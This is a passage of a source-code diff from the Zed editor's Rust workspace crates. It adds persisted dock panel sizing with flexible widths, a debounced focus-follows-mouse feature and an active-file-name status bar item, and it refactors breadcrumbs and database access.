ctrl-a" is duplicate of "ctrl-w a" "ctrl-w ctrl-a", "ctrl-w ctrl-c", diff --git a/crates/which_key/src/which_key_modal.rs b/crates/which_key/src/which_key_modal.rs index 238431b90a8eafdd0e085a3f109e8f812fbe709b..38b99207ea693b0cfc4113c4d4a4d70940090014 100644 --- a/crates/which_key/src/which_key_modal.rs +++ b/crates/which_key/src/which_key_modal.rs @@ -7,7 +7,7 @@ use gpui::{ }; use settings::Settings; use std::collections::HashMap; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{ Divider, DividerColor, DynamicSpacing, LabelSize, WithScrollbar, prelude::*, text_for_keystrokes, diff --git a/crates/workspace/Cargo.toml b/crates/workspace/Cargo.toml index dcd0bf640fdf279fb1874ba77307ccbd3c431393..42e64504f348a727d17d2538d06556497fba54df 100644 --- a/crates/workspace/Cargo.toml +++ b/crates/workspace/Cargo.toml @@ -14,7 +14,6 @@ doctest = false [features] test-support = [ - "call/test-support", "client/test-support", "http_client/test-support", "db/test-support", @@ -28,6 +27,7 @@ test-support = [ [dependencies] any_vec.workspace = true +agent_settings.workspace = true anyhow.workspace = true async-recursion.workspace = true client.workspace = true @@ -63,18 +63,18 @@ strum.workspace = true task.workspace = true telemetry.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true uuid.workspace = true +vim_mode_setting.workspace = true zed_actions.workspace = true [target.'cfg(target_os = "windows")'.dependencies] windows.workspace = true [dev-dependencies] -call = { workspace = true, features = ["test-support"] } client = { workspace = true, features = ["test-support"] } -dap = { workspace = true, features = ["test-support"] } db = { workspace = true, features = ["test-support"] } fs = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } diff --git a/crates/workspace/src/active_file_name.rs b/crates/workspace/src/active_file_name.rs new file mode 100644 index 0000000000000000000000000000000000000000..f35312d529423c4dc81bb71dc585c99169afdd39 --- /dev/null +++ b/crates/workspace/src/active_file_name.rs @@ -0,0 +1,69 @@ +use gpui::{ + Context, Empty, EventEmitter, IntoElement, ParentElement, Render, SharedString, Window, +}; +use settings::Settings; +use ui::{Button, Tooltip, prelude::*}; +use util::paths::PathStyle; + +use crate::{StatusItemView, item::ItemHandle, workspace_settings::StatusBarSettings}; + +pub struct ActiveFileName { + project_path: Option, + full_path: Option, +} + +impl ActiveFileName { + pub fn new() -> Self { + Self { + project_path: None, + full_path: None, + } + } +} + +impl Render for ActiveFileName { + fn render(&mut self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { + if !StatusBarSettings::get_global(cx).show_active_file { + return Empty.into_any_element(); + } + + let Some(project_path) = self.project_path.clone() else { + return Empty.into_any_element(); + }; + + let tooltip_text = self + .full_path + .clone() + .unwrap_or_else(|| project_path.clone()); + + div() + .child( + Button::new("active-file-name-button", project_path) + .label_size(LabelSize::Small) + .tooltip(Tooltip::text(tooltip_text)), + ) + .into_any_element() + } +} + +impl EventEmitter for ActiveFileName {} + +impl StatusItemView for ActiveFileName { + fn set_active_pane_item( + &mut self, + active_pane_item: Option<&dyn ItemHandle>, + _window: &mut Window, + cx: &mut Context, + ) { + if let Some(item) = active_pane_item { + self.project_path = item + .project_path(cx) + .map(|path| path.path.display(PathStyle::local()).into_owned().into()); + self.full_path = item.tab_tooltip_text(cx); + } else { + self.project_path = None; + self.full_path = None; + } + cx.notify(); + } +} diff --git a/crates/workspace/src/dock.rs b/crates/workspace/src/dock.rs index 439c6df5ee45938368895a67834d57df695fde89..e58b4b59100c05085c93993370b85a788fc159ca 100644 --- a/crates/workspace/src/dock.rs +++ b/crates/workspace/src/dock.rs @@ -1,8 +1,10 @@ +use crate::focus_follows_mouse::FocusFollowsMouse as _; use crate::persistence::model::DockData; -use crate::{DraggedDock, Event, ModalLayer, Pane}; +use crate::{DraggedDock, Event, FocusFollowsMouse, ModalLayer, Pane, WorkspaceSettings}; use crate::{Workspace, status_bar::StatusItemView}; use anyhow::Context as _; use client::proto; +use db::kvp::KeyValueStore; use gpui::{ Action, AnyView, App, Axis, Context, Corner, Entity, EntityId, EventEmitter, FocusHandle, @@ -10,10 +12,13 @@ use gpui::{ Render, SharedString, StyleRefinement, Styled, Subscription, WeakEntity, Window, deferred, div, px, }; -use settings::SettingsStore; +use serde::{Deserialize, Serialize}; +use settings::{Settings, SettingsStore}; use std::sync::Arc; -use ui::{ContextMenu, Divider, DividerColor, IconButton, Tooltip, h_flex}; -use ui::{prelude::*, right_click_menu}; +use ui::{ + ContextMenu, CountBadge, Divider, DividerColor, IconButton, Tooltip, prelude::*, + right_click_menu, +}; use util::ResultExt as _; pub(crate) const RESIZE_HANDLE_SIZE: Pixels = px(6.); @@ -33,8 +38,24 @@ pub trait Panel: Focusable + EventEmitter + Render + Sized { fn position(&self, window: &Window, cx: &App) -> DockPosition; fn position_is_valid(&self, position: DockPosition) -> bool; fn set_position(&mut self, position: DockPosition, window: &mut Window, cx: &mut Context); - fn size(&self, window: &Window, cx: &App) -> Pixels; - fn set_size(&mut self, size: Option, window: &mut Window, cx: &mut Context); + fn default_size(&self, window: &Window, cx: &App) -> Pixels; + fn initial_size_state(&self, _window: &Window, _cx: &App) -> PanelSizeState { + PanelSizeState::default() + } + fn size_state_changed(&mut self, _window: &mut Window, _cx: &mut Context) {} + fn supports_flexible_size(&self) -> bool { + false + } + fn has_flexible_size(&self, _window: &Window, _cx: &App) -> bool { + false + } + fn set_flexible_size( + &mut self, + _flexible: bool, + _window: &mut Window, + _cx: &mut Context, + ) { + } fn icon(&self, window: &Window, cx: &App) -> Option; fn icon_tooltip(&self, window: &Window, cx: &App) -> Option<&'static str>; fn toggle_action(&self) -> Box; @@ -59,6 +80,9 @@ pub trait Panel: Focusable + EventEmitter + Render + Sized { fn enabled(&self, _cx: &App) -> bool { true } + fn is_agent_panel(&self) -> bool { + false + } } pub trait PanelHandle: Send + Sync { @@ -73,8 +97,12 @@ pub trait PanelHandle: Send + Sync { fn set_active(&self, active: bool, window: &mut Window, cx: &mut App); fn remote_id(&self) -> Option; fn pane(&self, cx: &App) -> Option>; - fn size(&self, window: &Window, cx: &App) -> Pixels; - fn set_size(&self, size: Option, window: &mut Window, cx: &mut App); + fn default_size(&self, window: &Window, cx: &App) -> Pixels; + fn initial_size_state(&self, window: &Window, cx: &App) -> PanelSizeState; + fn size_state_changed(&self, window: &mut Window, cx: &mut App); + fn supports_flexible_size(&self, cx: &App) -> bool; + fn has_flexible_size(&self, window: &Window, cx: &App) -> bool; + fn set_flexible_size(&self, flexible: bool, window: &mut Window, cx: &mut App); fn icon(&self, window: &Window, cx: &App) -> Option; fn icon_tooltip(&self, window: &Window, cx: &App) -> Option<&'static str>; fn toggle_action(&self, window: &Window, cx: &App) -> Box; @@ -83,6 +111,7 @@ pub trait PanelHandle: Send + Sync { fn to_any(&self) -> AnyView; fn activation_priority(&self, cx: &App) -> u32; fn enabled(&self, cx: &App) -> bool; + fn is_agent_panel(&self, cx: &App) -> bool; fn move_to_next_position(&self, window: &mut Window, cx: &mut App) { let current_position = self.position(window, cx); let next_position = [ @@ -148,12 +177,28 @@ where T::remote_id() } - fn size(&self, window: &Window, cx: &App) -> Pixels { - self.read(cx).size(window, cx) + fn default_size(&self, window: &Window, cx: &App) -> Pixels { + self.read(cx).default_size(window, cx) + } + + fn initial_size_state(&self, window: &Window, cx: &App) -> PanelSizeState { + self.read(cx).initial_size_state(window, cx) } - fn set_size(&self, size: Option, window: &mut Window, cx: &mut App) { - self.update(cx, |this, cx| this.set_size(size, window, cx)) + fn size_state_changed(&self, window: &mut Window, cx: &mut App) { + self.update(cx, |this, cx| this.size_state_changed(window, cx)) + } + + fn supports_flexible_size(&self, cx: &App) -> bool { + self.read(cx).supports_flexible_size() + } + + fn has_flexible_size(&self, window: &Window, cx: &App) -> bool { + self.read(cx).has_flexible_size(window, cx) + } + + fn set_flexible_size(&self, flexible: bool, window: &mut Window, cx: &mut App) { + self.update(cx, |this, cx| this.set_flexible_size(flexible, window, cx)) } fn icon(&self, window: &Window, cx: &App) -> Option { @@ -187,6 +232,10 @@ where fn enabled(&self, cx: &App) -> bool { self.read(cx).enabled(cx) } + + fn is_agent_panel(&self, cx: &App) -> bool { + self.read(cx).is_agent_panel() + } } impl From<&dyn PanelHandle> for AnyView { @@ -204,6 +253,7 @@ pub struct Dock { is_open: bool, active_panel_index: Option, focus_handle: FocusHandle, + focus_follows_mouse: FocusFollowsMouse, pub(crate) serialized_dock: Option, zoom_layer_open: bool, modal_layer: Entity, @@ -260,8 +310,16 @@ impl DockPosition { } } +#[derive(Clone, Copy, Debug, Default, PartialEq, Serialize, Deserialize)] +pub struct PanelSizeState { + pub size: Option, + #[serde(default)] + pub flex: Option, +} + struct PanelEntry { panel: Arc, + size_state: PanelSizeState, _subscriptions: [Subscription; 3], } @@ -270,6 +328,27 @@ pub struct PanelButtons { _settings_subscription: Subscription, } +pub(crate) const PANEL_SIZE_STATE_KEY: &str = "dock_panel_size"; + +fn resize_panel_entry( + position: DockPosition, + entry: &mut PanelEntry, + size: Option, + flex: Option, + window: &mut Window, + cx: &mut App, +) -> (&'static str, PanelSizeState) { + let size = size.map(|size| size.max(RESIZE_HANDLE_SIZE).round()); + let use_flex = entry.panel.has_flexible_size(window, cx) && position.axis() == Axis::Horizontal; + if use_flex { + entry.size_state.flex = flex; + } else { + entry.size_state.size = size; + } + entry.panel.size_state_changed(window, cx); + (entry.panel.panel_key(), entry.size_state) +} + impl Dock { pub fn new( position: DockPosition, @@ -299,6 +378,7 @@ impl Dock { active_panel_index: None, is_open: false, focus_handle: focus_handle.clone(), + focus_follows_mouse: WorkspaceSettings::get_global(cx).focus_follows_mouse, _subscriptions: [focus_subscription, zoom_subscription], serialized_dock: None, zoom_layer_open: false, @@ -491,20 +571,37 @@ impl Dock { return; }; + let panel_id = Entity::entity_id(&panel); let was_visible = this.is_open() - && this.visible_panel().is_some_and(|active_panel| { - active_panel.panel_id() == Entity::entity_id(&panel) - }); - - this.remove_panel(&panel, window, cx); + && this + .visible_panel() + .is_some_and(|active_panel| active_panel.panel_id() == panel_id); + let size_state = this + .panel_entries + .iter() + .find(|entry| entry.panel.panel_id() == panel_id) + .map(|entry| entry.size_state) + .unwrap_or_default(); + + let previous_axis = this.position.axis(); + let next_axis = new_position.axis(); + let size_state = if previous_axis == next_axis { + size_state + } else { + PanelSizeState::default() + }; - new_dock.update(cx, |new_dock, cx| { - new_dock.remove_panel(&panel, window, cx); - }); + if !this.remove_panel(&panel, window, cx) { + // Panel was already moved from this dock + return; + } new_dock.update(cx, |new_dock, cx| { let index = new_dock.add_panel(panel.clone(), workspace.clone(), window, cx); + if let Some(added_panel) = new_dock.panel_for_id(panel_id).cloned() { + new_dock.set_panel_size_state(added_panel.as_ref(), size_state, cx); + } if was_visible { new_dock.set_open(true, window, cx); new_dock.activate_panel(index, window, cx); @@ -595,10 +692,13 @@ impl Dock { { *active_index += 1; } + let size_state = panel.read(cx).initial_size_state(window, cx); + self.panel_entries.insert( index, PanelEntry { panel: Arc::new(panel.clone()), + size_state, _subscriptions: subscriptions, }, ); @@ -670,6 +770,12 @@ impl Dock { self.panel_entries.len() } + pub fn has_agent_panel(&self, cx: &App) -> bool { + self.panel_entries + .iter() + .any(|entry| entry.panel.is_agent_panel(cx)) + } + pub fn activate_panel(&mut self, panel_ix: usize, window: &mut Window, cx: &mut Context) { if Some(panel_ix) != self.active_panel_index { if let Some(active_panel) = self.active_panel_entry() { @@ -712,32 +818,129 @@ impl Dock { } } - pub fn panel_size(&self, panel: &dyn PanelHandle, window: &Window, cx: &App) -> Option { + pub fn active_panel_size(&self) -> Option { + if self.is_open { + self.active_panel_entry().map(|entry| entry.size_state) + } else { + None + } + } + + pub fn stored_panel_size( + &self, + panel: &dyn PanelHandle, + window: &Window, + cx: &App, + ) -> Option { + self.panel_entries + .iter() + .find(|entry| entry.panel.panel_id() == panel.panel_id()) + .map(|entry| { + entry + .size_state + .size + .unwrap_or_else(|| entry.panel.default_size(window, cx)) + }) + } + + pub fn stored_panel_size_state(&self, panel: &dyn PanelHandle) -> Option { self.panel_entries .iter() .find(|entry| entry.panel.panel_id() == panel.panel_id()) - .map(|entry| entry.panel.size(window, cx)) + .map(|entry| entry.size_state) } - pub fn active_panel_size(&self, window: &Window, cx: &App) -> Option { + pub fn stored_active_panel_size(&self, window: &Window, cx: &App) -> Option { if self.is_open { - self.active_panel_entry() - .map(|entry| entry.panel.size(window, cx)) + self.active_panel_entry().map(|entry| { + entry + .size_state + .size + .unwrap_or_else(|| entry.panel.default_size(window, cx)) + }) } else { None } } + pub fn set_panel_size_state( + &mut self, + panel: &dyn PanelHandle, + size_state: PanelSizeState, + cx: &mut Context, + ) -> bool { + if let Some(entry) = self + .panel_entries + .iter_mut() + .find(|entry| entry.panel.panel_id() == panel.panel_id()) + { + entry.size_state = size_state; + cx.notify(); + true + } else { + false + } + } + + pub fn toggle_panel_flexible_size( + &mut self, + panel: &dyn PanelHandle, + current_size: Option, + current_flex: Option, + window: &mut Window, + cx: &mut Context, + ) { + let Some(entry) = self + .panel_entries + .iter_mut() + .find(|entry| entry.panel.panel_id() == panel.panel_id()) + else { + return; + }; + let currently_flexible = entry.panel.has_flexible_size(window, cx); + if currently_flexible { + entry.size_state.size = current_size; + } else { + entry.size_state.flex = current_flex; + } + let panel_key = entry.panel.panel_key(); + let size_state = entry.size_state; + let workspace = self.workspace.clone(); + entry + .panel + .set_flexible_size(!currently_flexible, window, cx); + entry.panel.size_state_changed(window, cx); + cx.defer(move |cx| { + if let Some(workspace) = workspace.upgrade() { + workspace.update(cx, |workspace, cx| { + workspace.persist_panel_size_state(panel_key, size_state, cx); + }); + } + }); + cx.notify(); + } + pub fn resize_active_panel( &mut self, size: Option, + flex: Option, window: &mut Window, cx: &mut Context, ) { - if let Some(entry) = self.active_panel_entry() { - let size = size.map(|size| size.max(RESIZE_HANDLE_SIZE).round()); - - entry.panel.set_size(size, window, cx); + if let Some(index) = self.active_panel_index + && let Some(entry) = self.panel_entries.get_mut(index) + { + let (panel_key, size_state) = + resize_panel_entry(self.position, entry, size, flex, window, cx); + + let workspace = self.workspace.clone(); + cx.defer(move |cx| { + if let Some(workspace) = workspace.upgrade() { + workspace.update(cx, |workspace, cx| { + workspace.persist_panel_size_state(panel_key, size_state, cx); + }); + } + }); cx.notify(); } } @@ -745,13 +948,27 @@ impl Dock { pub fn resize_all_panels( &mut self, size: Option, + flex: Option, window: &mut Window, cx: &mut Context, ) { - for entry in &mut self.panel_entries { - let size = size.map(|size| size.max(RESIZE_HANDLE_SIZE).round()); - entry.panel.set_size(size, window, cx); - } + let size_states_to_persist: Vec<_> = self + .panel_entries + .iter_mut() + .map(|entry| resize_panel_entry(self.position, entry, size, flex, window, cx)) + .collect(); + + let workspace = self.workspace.clone(); + cx.defer(move |cx| { + if let Some(workspace) = workspace.upgrade() { + workspace.update(cx, |workspace, cx| { + for (panel_key, size_state) in size_states_to_persist { + workspace.persist_panel_size_state(panel_key, size_state, cx); + } + }); + } + }); + cx.notify(); } @@ -770,22 +987,47 @@ impl Dock { dispatch_context } - pub fn clamp_panel_size(&mut self, max_size: Pixels, window: &mut Window, cx: &mut App) { + pub fn clamp_panel_size(&mut self, max_size: Pixels, window: &Window, cx: &mut App) { let max_size = (max_size - RESIZE_HANDLE_SIZE).abs(); - for panel in self.panel_entries.iter().map(|entry| &entry.panel) { - if panel.size(window, cx) > max_size { - panel.set_size(Some(max_size.max(RESIZE_HANDLE_SIZE)), window, cx); + for entry in &mut self.panel_entries { + let use_flexible = entry.panel.has_flexible_size(window, cx); + if use_flexible { + continue; + } + + let size = entry + .size_state + .size + .unwrap_or_else(|| entry.panel.default_size(window, cx)); + if size > max_size { + entry.size_state.size = Some(max_size.max(RESIZE_HANDLE_SIZE)); } } } + + pub(crate) fn load_persisted_size_state( + workspace: &Workspace, + panel_key: &'static str, + cx: &App, + ) -> Option { + let workspace_id = workspace + .database_id() + .map(|id| i64::from(id).to_string()) + .or(workspace.session_id())?; + let kvp = KeyValueStore::global(cx); + let scope = kvp.scoped(PANEL_SIZE_STATE_KEY); + scope + .read(&format!("{workspace_id}:{panel_key}")) + .log_err() + .flatten() + .and_then(|json| serde_json::from_str::(&json).log_err()) + } } impl Render for Dock { - fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { + fn render(&mut self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { let dispatch_context = Self::dispatch_context(); if let Some(entry) = self.visible_entry() { - let size = entry.panel.size(window, cx); - let position = self.position; let create_resize_handle = || { let handle = div() @@ -804,7 +1046,7 @@ impl Render for Dock { MouseButton::Left, cx.listener(|dock, e: &MouseUpEvent, window, cx| { if e.click_count == 2 { - dock.resize_active_panel(None, window, cx); + dock.resize_active_panel(None, None, window, cx); dock.workspace .update(cx, |workspace, cx| { workspace.serialize_workspace(window, cx); @@ -847,15 +1089,19 @@ impl Render for Dock { }; div() + .id("dock-panel") .key_context(dispatch_context) .track_focus(&self.focus_handle(cx)) + .focus_follows_mouse(self.focus_follows_mouse, cx) .flex() .bg(cx.theme().colors().panel_background) .border_color(cx.theme().colors().border) .overflow_hidden() .map(|this| match self.position().axis() { - Axis::Horizontal => this.w(size).h_full().flex_row(), - Axis::Vertical => this.h(size).w_full().flex_col(), + // Width and height are always set on the workspace wrapper in + // render_dock, so fill whatever space the wrapper provides. + Axis::Horizontal => this.w_full().h_full().flex_row(), + Axis::Vertical => this.h_full().w_full().flex_col(), }) .map(|this| match self.position() { DockPosition::Left => this.border_r_1(), @@ -865,8 +1111,8 @@ impl Render for Dock { .child( div() .map(|this| match self.position().axis() { - Axis::Horizontal => this.min_w(size).h_full(), - Axis::Vertical => this.min_h(size).w_full(), + Axis::Horizontal => this.w_full().h_full(), + Axis::Vertical => this.h_full().w_full(), }) .child( entry @@ -880,6 +1126,7 @@ impl Render for Dock { }) } else { div() + .id("dock-panel") .key_context(dispatch_context) .track_focus(&self.focus_handle(cx)) } @@ -909,7 +1156,9 @@ impl Render for PanelButtons { DockPosition::Bottom | DockPosition::Right => (Corner::BottomRight, Corner::TopRight), }; - let buttons: Vec<_> = dock + let dock_entity = self.dock.clone(); + let workspace = dock.workspace.clone(); + let mut buttons: Vec<_> = dock .panel_entries .iter() .enumerate() @@ -924,6 +1173,10 @@ impl Render for PanelButtons { .log_err()?; let name = entry.panel.persistent_name(); let panel = entry.panel.clone(); + let supports_flexible = panel.supports_flexible_size(cx); + let currently_flexible = panel.has_flexible_size(window, cx); + let dock_for_menu = dock_entity.clone(); + let workspace_for_menu = workspace.clone(); let is_active_button = Some(i) == active_index && is_open; let (action, tooltip) = if is_active_button { @@ -940,6 +1193,7 @@ impl Render for PanelButtons { }; let focus_handle = dock.focus_handle(cx); + let icon_label = entry.panel.icon_label(window, cx); Some( right_click_menu(name) @@ -951,19 +1205,75 @@ impl Render for PanelButtons { ]; ContextMenu::build(window, cx, |mut menu, _, cx| { + let mut has_position_entries = false; for position in POSITIONS { - if position != dock_position - && panel.position_is_valid(position, cx) - { + if panel.position_is_valid(position, cx) { + let is_current = position == dock_position; let panel = panel.clone(); - menu = menu.entry( + menu = menu.toggleable_entry( format!("Dock {}", position.label()), + is_current, + IconPosition::Start, None, move |window, cx| { - panel.set_position(position, window, cx); + if !is_current { + panel.set_position(position, window, cx); + } }, - ) + ); + has_position_entries = true; + } + } + if supports_flexible { + if has_position_entries { + menu = menu.separator(); } + let panel_for_flex = panel.clone(); + let dock_for_flex = dock_for_menu.clone(); + let workspace_for_flex = workspace_for_menu.clone(); + menu = menu.toggleable_entry( + "Flex Width", + currently_flexible, + IconPosition::Start, + None, + move |window, cx| { + if !currently_flexible { + if let Some(ws) = workspace_for_flex.upgrade() { + ws.update(cx, |workspace, cx| { + workspace.toggle_dock_panel_flexible_size( + &dock_for_flex, + panel_for_flex.as_ref(), + window, + cx, + ); + }); + } + } + }, + ); + let panel_for_fixed = panel.clone(); + let dock_for_fixed = dock_for_menu.clone(); + let workspace_for_fixed = workspace_for_menu.clone(); + menu = menu.toggleable_entry( + "Fixed Width", + !currently_flexible, + IconPosition::Start, + None, + move |window, cx| { + if currently_flexible { + if let Some(ws) = workspace_for_fixed.upgrade() { + ws.update(cx, |workspace, cx| { + workspace.toggle_dock_panel_flexible_size( + &dock_for_fixed, + panel_for_fixed.as_ref(), + window, + cx, + ); + }); + } + } + }, + ); } menu }) @@ -973,7 +1283,7 @@ impl Render for PanelButtons { .trigger(move |is_active, _window, _cx| { // Include active state in element ID to invalidate the cached // tooltip when panel state changes (e.g., via keyboard shortcut) - IconButton::new((name, is_active_button as u64), icon) + let button = IconButton::new((name, is_active_button as u64), icon) .icon_size(IconSize::Small) .toggle_state(is_active_button) .on_click({ @@ -987,18 +1297,32 @@ impl Render for PanelButtons { this.tooltip(move |_window, cx| { Tooltip::for_action(tooltip.clone(), &*action, cx) }) - }) + }); + + div().relative().child(button).when_some( + icon_label + .clone() + .filter(|_| !is_active_button) + .and_then(|label| label.parse::().ok()), + |this, count| this.child(CountBadge::new(count)), + ) }), ) }) .collect(); + if dock_position == DockPosition::Right { + buttons.reverse(); + } + let has_buttons = !buttons.is_empty(); h_flex() .gap_1() .when( - has_buttons && dock.position == DockPosition::Bottom, + has_buttons + && (dock.position == DockPosition::Bottom + || dock.position == DockPosition::Right), |this| this.child(Divider::vertical().color(DividerColor::Border)), ) .children(buttons) @@ -1029,7 +1353,8 @@ pub mod test { pub zoomed: bool, pub active: bool, pub focus_handle: FocusHandle, - pub size: Pixels, + pub default_size: Pixels, + pub flexible: bool, pub activation_priority: u32, } actions!(test_only, [ToggleTestPanel]); @@ -1043,10 +1368,22 @@ pub mod test { zoomed: false, active: false, focus_handle: cx.focus_handle(), - size: px(300.), + default_size: px(300.), + flexible: false, activation_priority, } } + + pub fn new_flexible( + position: DockPosition, + activation_priority: u32, + cx: &mut App, + ) -> Self { + Self { + flexible: true, + ..Self::new(position, activation_priority, cx) + } + } } impl Render for TestPanel { @@ -1077,12 +1414,32 @@ pub mod test { cx.update_global::(|_, _| {}); } - fn size(&self, _window: &Window, _: &App) -> Pixels { - self.size + fn default_size(&self, _window: &Window, _: &App) -> Pixels { + self.default_size + } + + fn initial_size_state(&self, _window: &Window, _: &App) -> PanelSizeState { + PanelSizeState { + size: None, + flex: None, + } + } + + fn supports_flexible_size(&self) -> bool { + self.flexible + } + + fn has_flexible_size(&self, _window: &Window, _: &App) -> bool { + self.flexible } - fn set_size(&mut self, size: Option, _window: &mut Window, _: &mut Context) { - self.size = size.unwrap_or(px(300.)); + fn set_flexible_size( + &mut self, + flexible: bool, + _window: &mut Window, + _cx: &mut Context, + ) { + self.flexible = flexible; } fn icon(&self, _window: &Window, _: &App) -> Option { diff --git a/crates/workspace/src/focus_follows_mouse.rs b/crates/workspace/src/focus_follows_mouse.rs new file mode 100644 index 0000000000000000000000000000000000000000..da433cefcf059960181c190da83b06260651b063 --- /dev/null +++ b/crates/workspace/src/focus_follows_mouse.rs @@ -0,0 +1,71 @@ +use gpui::{ + AnyWindowHandle, AppContext as _, Context, FocusHandle, Focusable, Global, + StatefulInteractiveElement, Task, +}; + +use crate::workspace_settings; + +#[derive(Default)] +struct FfmState { + // The window and element to be focused + handles: Option<(AnyWindowHandle, FocusHandle)>, + // The debounced task which will do the focusing + _debounce_task: Option>, +} + +impl Global for FfmState {} + +pub trait FocusFollowsMouse: StatefulInteractiveElement { + fn focus_follows_mouse( + self, + settings: workspace_settings::FocusFollowsMouse, + cx: &Context, + ) -> Self { + if settings.enabled { + self.on_hover(cx.listener(move |this, enter, window, cx| { + if *enter { + let window_handle = window.window_handle(); + let focus_handle = this.focus_handle(cx); + + let state = cx.try_global::(); + + // Only replace the target if the new handle doesn't contain the existing one. + // This ensures that hovering over a parent (e.g., Dock) doesn't override + // a more specific child target (e.g., a Pane inside the Dock). + let should_replace = state + .and_then(|s| s.handles.as_ref()) + .map(|(_, existing)| !focus_handle.contains(existing, window)) + .unwrap_or(true); + + if !should_replace { + return; + } + + let debounce_task = cx.spawn(async move |_this, cx| { + cx.background_executor().timer(settings.debounce).await; + + cx.update(|cx| { + let state = cx.default_global::(); + let Some((window, focus)) = state.handles.take() else { + return; + }; + + let _ = cx.update_window(window, move |_view, window, cx| { + window.focus(&focus, cx); + }); + }); + }); + + cx.set_global(FfmState { + handles: Some((window_handle, focus_handle)), + _debounce_task: Some(debounce_task), + }); + } + })) + } else { + self + } + } +} + +impl FocusFollowsMouse for T {} diff --git a/crates/workspace/src/history_manager.rs b/crates/workspace/src/history_manager.rs index 52f6be08b5972ab77a384aa8c0cf34fb29c2753c..9b03a3252d32793e12495817c2d9801d610d3ce4 100644 --- a/crates/workspace/src/history_manager.rs +++ b/crates/workspace/src/history_manager.rs @@ -7,7 +7,8 @@ use ui::{App, Context}; use util::{ResultExt, paths::PathExt}; use crate::{ - NewWindow, SerializedWorkspaceLocation, WORKSPACE_DB, WorkspaceId, path_list::PathList, + NewWindow, SerializedWorkspaceLocation, WorkspaceId, path_list::PathList, + persistence::WorkspaceDb, }; pub fn init(fs: Arc, cx: &mut App) { @@ -40,8 +41,9 @@ impl HistoryManager { } fn init(this: Entity, fs: Arc, cx: &App) { + let db = WorkspaceDb::global(cx); cx.spawn(async move |cx| { - let recent_folders = WORKSPACE_DB + let recent_folders = db .recent_workspaces_on_disk(fs.as_ref()) .await .unwrap_or_default() @@ -102,6 +104,7 @@ impl HistoryManager { .map(|entry| entry.path.clone()) .collect::>(); let user_removed = cx.update_jump_list(menus, entries); + let db = WorkspaceDb::global(cx); cx.spawn(async move |this, cx| { let user_removed = user_removed.await; if user_removed.is_empty() { @@ -119,7 +122,7 @@ impl HistoryManager { } }) { for id in deleted_ids.iter() { - WORKSPACE_DB.delete_workspace_by_id(*id).await.log_err(); + db.delete_workspace_by_id(*id).await.log_err(); } } }) diff --git a/crates/workspace/src/item.rs b/crates/workspace/src/item.rs index b29e02f05b367bab557403f3bb34f6ffa45caecc..64647419e300357e360e3ac3f535d8bbcd076711 100644 --- a/crates/workspace/src/item.rs +++ b/crates/workspace/src/item.rs @@ -9,13 +9,14 @@ use crate::{ }; use anyhow::Result; use client::{Client, proto}; -use futures::{StreamExt, channel::mpsc}; +use futures::channel::mpsc; use gpui::{ Action, AnyElement, AnyEntity, AnyView, App, AppContext, Context, Entity, EntityId, - EventEmitter, FocusHandle, Focusable, Font, HighlightStyle, Pixels, Point, Render, - SharedString, Task, WeakEntity, Window, + EventEmitter, FocusHandle, Focusable, Font, Pixels, Point, Render, SharedString, Task, + WeakEntity, Window, }; use language::Capability; +pub use language::HighlightedText; use project::{Project, ProjectEntryId, ProjectPath}; pub use settings::{ ActivateOnClose, ClosePosition, RegisterSetting, Settings, SettingsLocation, ShowCloseButton, @@ -25,7 +26,6 @@ use smallvec::SmallVec; use std::{ any::{Any, TypeId}, cell::RefCell, - ops::Range, path::Path, rc::Rc, sync::Arc, @@ -124,14 +124,6 @@ pub enum ItemEvent { Edit, } -// TODO: Combine this with existing HighlightedText struct? -#[derive(Debug)] -pub struct BreadcrumbText { - pub text: String, - pub highlights: Option, HighlightStyle)>>, - pub font: Option, -} - #[derive(Clone, Copy, Default, Debug)] pub struct TabContentParams { pub detail: Option, @@ -329,7 +321,7 @@ pub trait Item: Focusable + EventEmitter + Render + Sized { ToolbarItemLocation::Hidden } - fn breadcrumbs(&self, _cx: &App) -> Option> { + fn breadcrumbs(&self, _cx: &App) -> Option<(Vec, Option)> { None } @@ -366,6 +358,18 @@ pub trait Item: Focusable + EventEmitter + Render + Sized { true } + /// Called when the containing pane receives a drop on the item or the item's tab. + /// Returns `true` to consume it and suppress the pane's default drop behavior. + fn handle_drop( + &self, + _active_pane: &Pane, + _dropped: &dyn Any, + _window: &mut Window, + _cx: &mut App, + ) -> bool { + false + } + /// Returns additional actions to add to the tab's context menu. /// Each entry is a label and an action to dispatch. fn tab_extra_context_menu_actions( @@ -536,7 +540,7 @@ pub trait ItemHandle: 'static + Send { ) -> gpui::Subscription; fn to_searchable_item_handle(&self, cx: &App) -> Option>; fn breadcrumb_location(&self, cx: &App) -> ToolbarItemLocation; - fn breadcrumbs(&self, cx: &App) -> Option>; + fn breadcrumbs(&self, cx: &App) -> Option<(Vec, Option)>; fn breadcrumb_prefix(&self, window: &mut Window, cx: &mut App) -> Option; fn show_toolbar(&self, cx: &App) -> bool; fn pixel_position_of_cursor(&self, cx: &App) -> Option>; @@ -545,6 +549,13 @@ pub trait ItemHandle: 'static + Send { fn preserve_preview(&self, cx: &App) -> bool; fn include_in_nav_history(&self) -> bool; fn relay_action(&self, action: Box, window: &mut Window, cx: &mut App); + fn handle_drop( + &self, + active_pane: &Pane, + dropped: &dyn Any, + window: &mut Window, + cx: &mut App, + ) -> bool; fn tab_extra_context_menu_actions( &self, window: &mut Window, @@ -766,8 +777,8 @@ impl ItemHandle for Entity { send_follower_updates = Some(cx.spawn_in(window, { let pending_update = pending_update.clone(); async move |workspace, cx| { - while let Some(mut leader_id) = pending_update_rx.next().await { - while let Ok(Some(id)) = pending_update_rx.try_next() { + while let Ok(mut leader_id) = pending_update_rx.recv().await { + while let Ok(id) = pending_update_rx.try_recv() { leader_id = id; } @@ -925,25 +936,39 @@ impl ItemHandle for Entity { }, )); - cx.on_blur( + cx.on_focus_out( &self.read(cx).focus_handle(cx), window, - move |workspace, window, cx| { + move |workspace, _event, window, cx| { if let Some(item) = weak_item.upgrade() && item.workspace_settings(cx).autosave == AutosaveSetting::OnFocusChange { // Only trigger autosave if focus has truly left the item. // If focus is still within the item's hierarchy (e.g., moved to a context menu), // don't trigger autosave to avoid unwanted formatting and cursor jumps. - // Also skip autosave if focus moved to a modal (e.g., command palette), - // since the user is still 